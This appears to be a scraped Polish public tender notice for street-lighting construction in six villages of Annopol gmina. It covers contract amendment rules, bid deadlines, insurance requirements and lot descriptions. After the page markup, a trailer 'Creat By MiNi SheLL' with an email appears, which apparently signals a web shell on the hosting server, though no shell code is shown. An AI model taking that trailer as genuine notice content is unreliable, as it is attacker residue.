godzinowego;c)	nastąpiła zmiana technologii, sposobu wykonania robót, liczby lub asortymentu dostarczonych urządzeń.W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie proporcjonalnie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione należycie świadczenia oraz udokumentowane, uzasadnione i celowe koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. 5.	Zmiana postanowień zawartej umowy jest także dopuszczalna w przypadkach wymienionych w art. 144 ust. 1 pkt. 2 - 6 ustawy Prawo zamówień publicznych.6.	Warunki wprowadzenia zmiany do umowy:1)	Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, o których mowa w ust. 1-3 powyżej.2)	Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.3)	Złożony wniosek przez stronę inicjującą zmianę musi zawierać:a)	opis propozycji zmiany,b)	uzasadnienie zmiany,c)	opis wpływu zmiany na warunki realizacji umowy.4)	Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności.7.	Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia w zakresie, w jakim konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-04-12</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Ofertę należy przygotować według wymagań określonych w SIWZ Pełnomocnictwo do podpisania oferty, o ile umocowanie do dokonania przedmiotowej czynności nie wynika z dokumentów rejestrowych załączonych do oferty, złożone w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni załączyć do oferty oryginał pełnomocnictwa lub poświadczony za zgodność z oryginałem przez notariusza. Wykonawca przed podpisaniem umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 10% ceny całkowitej podanej w ofercie. Wybrany Wykonawca , zobowiązany jest przedłożyć Zamawiającemu kopię polisy ubezpieczeniowej z okresem odpowiedzialności rozpoczynającym się od dnia przekazania placu budowy do końca trwania prac kontraktowych, w zakresie ubezpieczenia wszystkich ryzyk budowy i montażu, którego przedmiotem ubezpieczenia będą roboty kontraktowe, na które składa się wartość wykonywanych prac budowlanych na kwotę nie mniejszą niż wartość oferty brutto oraz wszelkie wykorzystywane materiały, sprzęt budowlany wraz z zapleczem budowy. Ubezpieczenie będzie obejmować co najmniej okres realizacji niniejszej umowy.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Budowa oświetlenia w m. Janiszów (transformator nr 5).</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego wydzielonego w miejscowości Janiszów gmina Annopol - oświetlenie drogi powiatowej nr 2710 zasilane ze stacji transformatorowej ,,Janiszów 5"":o	budowa złącza słupowego ZS zgodnie z rys. Nr E-04 dokumentacji projektowej wraz z zasilaniem złącza,o	budowa linii kablowej zalicznikowej, zasilającej projektowane oświetlenie drogowe kablem YAKXS 4x35 mm2 od projektowanego złącza ZS na słupie nr 9/V do projektowanego słupa oświetleniowego 9/1/WO długości 31,0/61,0 m, o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodem izolowanym typu AsXSn 2x35 mm2, zawieszonym na projektowanych słupach z żerdzi wirowanych typu E, na których zamontowane zostaną na wysięgnikach rurowych oprawy oświetleniowe na źródła światła LED. Długość projektowanej linii napowietrznej wynosi 262/275 m - obwód nr 1 i 307/325 m - obwód nr 2 (razem 569/600 m), na 14 słupach,o	uziemienie robocze i odgromowe słupów nr 9/1/WO, 9/7/WO, 9/14/WO,o	ochrona przeciwprzepięciowa - ograniczniki przepięć 5 szt. wg projektu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45311100-1, 45316110-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-07-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji (rękojmi)</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Budowa oświetlenia w m. Kopiec</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego wydzielonego i podwieszonego w miejscowości Kopiec gmina Annopol - oświetlenie odcinka drogi gminnej na działkach o nr ewidencyjnych 74 - obręb Kopiec i 950 - obręb Świeciechów Poduchowny":o	dostosowanie członu oświetleniowego rozdzielnicy stacyjnej nN ,,Świeciechów 1" do wyprowadzenia obwodu oświetlenia drogowego poprzez wymianę wkładki topikowej przedlicznikowej na wkładkę WT-00/gF 25A oraz dobudowę wyłącznika nadprądowego S301 C16 A do zabezpieczenia zalicznikowego projektowanego obwodu oświetleniowego,o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodami izolowanymi typu AsXSn 2x35 mm2, w tym:a)	oświetlenie podwieszone na odcinkach: od istniejącej słupowej stacji transformatorowej ,,Świeciechów 1" do istniejącego słupa nr 2 oraz od istniejącego słupa nr 9 do istniejącego słupa nr 11/1 z montażem opraw oświetlenia drogowego LED na istniejących słupach nr 1, 9, 10, 11, 11/1. Długość projektowanego przewodu podwieszonego AsXSn 2x35 mm2 wynosi 166/183 m,b)	oświetlenie wydzielone na odcinku od istniejącego słupa nr 2 do istniejącego słupa nr 9 w tym montaż słupów z żerdzi wirowanych od nr 1/A/WO do nr 6/A/WO (6 szt.), montaż opraw oświetlenia drogowego LED na projektowanych słupach nr 1/A/WO, 3/A/WO, 4/A/WO, 5/A/WO, 6/A/WO. Długość projektowanego przewodu wydzielonego AsXSn 2x35 mm2 wynosi 241/255 m,o	ochrona przeciwprzepięciowa - montaż ochronnika przepięć na przewodzie fazowym przewodu oświetleniowego na słupie nr 11/1 z wykorzystaniem istniejącego uziomu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45311100-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-07-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji (rękojmi)</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Budowa oświetlenia w m. Opoka (od P. Siewierskiego do P. Szymuli).</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego wydzielonego w miejscowości Opoka Kolonia, obręb: 0016 Opoka, gmina Annopol - oświetlenie drogi gminnej - dz. nr ewidencyjny 1969":o	budowa szafki oświetleniowej ,,SO" z układem pomiarowo - rozliczeniowym zgodnie z rys. Nr E-03 projektu budowlano - wykonawczego,o	budowa przyłącza kablowego YAKXS 4x35 mm2 z szafką słupowo - przyłączeniową SSP-3 na słupie nr 11/4, relacji od istniejącego słupa nr 11/4 do projektowanej szafki oświetleniowej SO długości 4,0/13,0 m. Zasilanie szafki SSP-3 od istniejących przewodów gołych linii nN 4xAL 25 mm2 kablem YAKXS 4x70 mm2 ułożonym na słupie,o	budowa linii kablowej zalicznikowej, zasilającej projektowane oświetlenie drogowe kablem YAKXS 4x35 mm2 od projektowanej szafki oświetleniowej ,,SO" do projektowanego słupa nr 1/A/WO długości 16,0/32,0 m, o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodami izolowanymi typu AsXSn 2x35 mm2, zawieszonymi na projektowanych słupach z żerdzi wirowanych typu E, na których zamontowane zostaną na wysięgnikach rurowych oprawy oświetleniowe na źródła światła LED (9 szt.). Długość projektowanej linii napowietrznej wynosi 344/361 m na 10 słupach,o	uziemienie robocze szafki oświetleniowej SO,o	uziemienie robocze i odgromowe słupów nr 11/4/IV, 1/A/WO, 10/A/WO,o	ochrona przeciwprzepięciowa poprzez montaż ograniczników przepięć na przewodach linii napowietrznej oświetleniowej wg projektu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45311100-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-07-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji (rękojmi)</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Budowa oświetlenia w m. Opoka (od P. E. Juda do P. H. Juda).</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego wydzielonego w miejscowości Opoka Kolonia gmina Annopol - oświetlenie odcinka drogi wojewódzkiej nr 854 Annopol - Kosin - Antoniów - Gorzyce w około od km 2+684 do ok. km 2+847 (działka o numerze ewidencyjnym 630, obręb 0016 Opoka)":o	demontaż istniejącej oprawy oświetleniowej OUS-150 z istniejącego słupa nr 32,o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodem izolowanym typu AsXSn 2x35 mm2, zawieszonym na projektowanych słupach z żerdzi wirowanych typu E, na których zamontowane zostaną na wysięgnikach rurowych oprawy oświetleniowe na źródła światła LED. Długość projektowanej linii napowietrznej wynosi 171/182 m na 5 projektowanych słupach zasilanej z istniejącego słupa nr 32,o	uziemienie robocze i odgromowe słupa o projektowanym nr 5/A/WO,o	ochronę przeciwprzepięciową poprzez montaż ograniczników przepięć wg projektu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45311100-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-07-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji (rękojmi)</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Budowa oświetlenia w m. Kosin (droga woj. Nr 755 Zawichost - Kosin)</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego podwieszonego w miejscowości Kosin gmina Annopol - oświetlenie odcinka drogi wojewódzkiej nr 755 Zawichost - Kosin w km od 3+529 do 3+813 - dz. nr ewidencyjny 1816":o	budowa 1-fazowej, podwieszonej linii napowietrznej - oświetleniowej nN przewodem izolowanym typu AsXSn 2x35 mm2. Długość odcinka linii napowietrznej podwieszonej - 237/254 m,o	budowę linii kablowej oświetleniowej kablem ziemnym typu YAKXS 4x35 mm2 długości 49/74 m w tym przewiert poziomy długości 10 m,o	montaż opraw oświetlenia drogowego wraz z wysięgnikami - 6 szt,o	wymiana istniejącego słupa typu P-10/ŻN nr 16/IV na słupa z żerdzi wirowanej typu P3-12/4,3 - 1 szt,o	montaż ochronników przepięć na słupach nr 10/IV, 13/IV, 16/IV - 3 szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45311100-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-07-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji (rękojmi)</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Budowa oświetlenia w m. Borów (Górki)</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego podwieszonego i wydzielonego w miejscowości Borów gmina Annopol - oświetlenie drogi gminnej- dz. nr ewidencyjny 4116":o	budowa szafki oświetleniowej z układem pomiarowo - rozliczeniowym zgodnie z rys. Nr E-03 projektu budowlano - wykonawczego,o	budowa przyłącza kablowego YAKXS 4x35 mm2 z szafką słupowo - przyłączeniową SSP-3 na słupie, od istniejącego słupa nr 6/II do projektowanej szafki oświetleniowej SO długości 6,0/17,0 m. Zasilanie szafki SSP-3 od istniejących przewodów AsXSn 4x70 mm2 kablem YAKXS 4x70 mm2 ułożonym na słupie,o	budowa linii kablowej zalicznikowej, zasilającej projektowane oświetlenie drogowe kablem YAKXS 4x35 mm2 od projektowanej szafki oświetleniowej ,,SO" do istniejącego słupa nr 6/II długości 6,0/22,0 m,o	budowa 1-fazowej, podwieszonej linii napowietrznej oświetleniowej nN z przewodami izolowanymi typu AsXSn 2x35 mm2, zawieszonymi na istniejących słupach - odcinek od istniejącego słupa nr 6/II do istniejącego słupa nr 12/II. Długość odcinka linii napowietrznej podwieszonej wynosi 268/280 m,o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodami izolowanymi typu AsXSn 2x35 mm2 - oświetlenie wydzielone - od istniejącego słupa nr 12/II do projektowanego słupa nr 12/1/II/WO. Długość odcinka linii napowietrznej oświetlenia wydzielonego wynosi 55/59 m,o	montaż opraw oświetlenia drogowego wraz z podłączeniem do przewodów oświetleniowych na słupach od nr 6/II do 12/1/II/WO - 8 szt. Oprawy sodowe ze źródłami światła - lampy sodowe o mocy 150W,o	uziemienie robocze szafki oświetleniowej SO,o	uziemienie robocze i odgromowe słupa nr 12/1/II/WO,o	ochrona przeciwprzepięciową poprzez montaż ograniczników przepięć wg projektu.Zakres robót zgodny z dokumentacją techniczną, specyfikacją techniczną wykonania i odbioru robót, przedmiarem robót (załączone przedmiary robót należy traktować jako element dodatkowy, pomocny w obliczeniu ceny oferty) - załącznik nr 1 do SIWZ.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45316110-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-07-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji (rękojmi)</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com